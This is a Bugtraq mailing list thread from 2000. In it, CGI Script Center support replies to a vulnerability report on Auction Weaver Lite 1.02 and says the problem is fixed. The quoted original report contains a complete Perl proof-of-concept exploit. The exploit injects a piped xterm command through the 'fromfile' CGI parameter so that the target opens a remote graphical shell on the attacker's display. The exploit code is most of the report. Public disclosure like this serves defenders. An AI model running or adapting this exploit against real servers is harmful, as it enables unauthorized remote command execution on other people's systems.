Bugtraq mailing list archives
Re: More problems with Auction Weaver & CGI Script Center.
From: CGI Script Center Support <support () cgiscriptcenter com>
Date: Sat, 2 Sep 2000 16:49:02 -0700
Auction Weaver Lite 1.02 was opening files to be read without using the READ "<" command, which allowed outside commands to be executed on UNIX platforms using Xterm. All files being opened for reading have now been updated.
I have only been able to check the below exploit on the shareware version, but I strongly believe that the PRO version is exploitable as well.
No Professional version is yet available. The below exploit should no longer be valid. CGI Script Center Support support () cgiscriptcenter com
-----Original Message----- From: teleh0r - [mailto:teleh0r () doglover com] Sent: Wednesday, August 30, 2000 10:21 AM To: BUGTRAQ () SECURITYFOCUS COM Cc: support () cgiscriptcenter com Subject: More problems with Auction Weaver & CGI Script Center. CGI Script Center recently upgraded Auction Weaver 1.0 to 1.2 due to a security issue found and reported by Meliksah Ozoral. Today, I decided to take a look at Auction Weaver just to check if the issue and possible other security problems were now fixed. I guessed they had taken a *close* look at their scripts, considering the problems reported lately - but I guessed wrong... I have only been able to check the below exploit on the shareware version, but I strongly believe that the PRO version is exploitable as well. Or perhaps only those who pays gets secure scripts? Maybe that would be a successful business policy? ;) CGI Script Center, _please_ contact me if you want help securing your scripts. Sincerely yours, teleh0r 8<---auctionweaver-exploit.pl------------------------------------ #!/usr/bin/perl -w ## Auction Weaver 1.02 / Only confirmed with LITE ## - Proof of Concept exploit - ## ## CGI Script Center have just released an update ## of Auction Weaver due to security reasons - I ## suggest that you spend some more time securing ## it, and the other scripts - It is really needed. ## ## This exploit will spawn a xterm from $target ## to $attacker. ## ## This exploit will not work on hosts running ## Auction Weaver on NT, due to the xterm call. ## ## CGI Script Center, please contact me if you need ## help with securing your scripts... ## ## teleh0r () doglover com / anno 2000 ## http://teleh0r.cjb.net use strict; use Socket; if (@ARGV < 3) { print("Usage: $0 <target> <attacker> <dpy>\n"); exit(1); } my($target,$attacker,$dpy,$length,$cgicode, $agent,$sploit,$iaddr,$paddr,$proto); ($target,$attacker,$dpy) = @ARGV; if ($dpy !~ /\d/) { print("dpy must be a number, probably 0\n"); exit(1); } print("\nRemote host: $target\n"); print("CGI-script: /cgi-bin/awl/auctionweaver.pl\n"); print("Command: xterm -ut -display $attacker:$dpy\n\n"); system("xhost + $target"); $length = 138 + length($attacker.$dpy); $cgicode = "flag1=1&fromfile=%7Cxterm+-display+$attacker%3A$dpy%7C&placebid=1 &catdir". "=cat1&username=teleh0r&password=ohbaby&bid=Ihavenomoney&nobiditem =1&sbut". "ton=BID"; $agent = "Mozilla/4.0 (compatible; MSIE 5.01; Windows 95)"; # The path to auctionweaver.pl may of course need to be changed. $sploit= "POST /cgi-bin/awl/auctionweaver.pl HTTP/1.0 Connection: close User-Agent: $agent Host: $target Content-type: application/x-www-form-urlencoded Content-length: $length $cgicode"; $iaddr = inet_aton($target) || die("Error: $!\n"); $paddr = sockaddr_in(80, $iaddr) || die("Error: $!\n"); $proto = getprotobyname('tcp') || die("Error: $!\n"); socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n"); connect(SOCKET, $paddr) || die("Error: $!\n"); send(SOCKET,"$sploit\015\012", 0) || die("Error: $!\n"); close(SOCKET); sleep(3); system("xhost - $target"); print("\nAll done - hopefully you got the flying xterm!\n"); exit(0) ----------------------------------------------------------------- ______________________________________________ FREE Personalized Email at Mail.com Sign up at http://www.mail.com/?sr=signup
Current thread:
- More problems with Auction Weaver & CGI Script Center. teleh0r - (Sep 01)
- <Possible follow-ups>
- Re: More problems with Auction Weaver & CGI Script Center. CGI Script Center Support (Sep 03)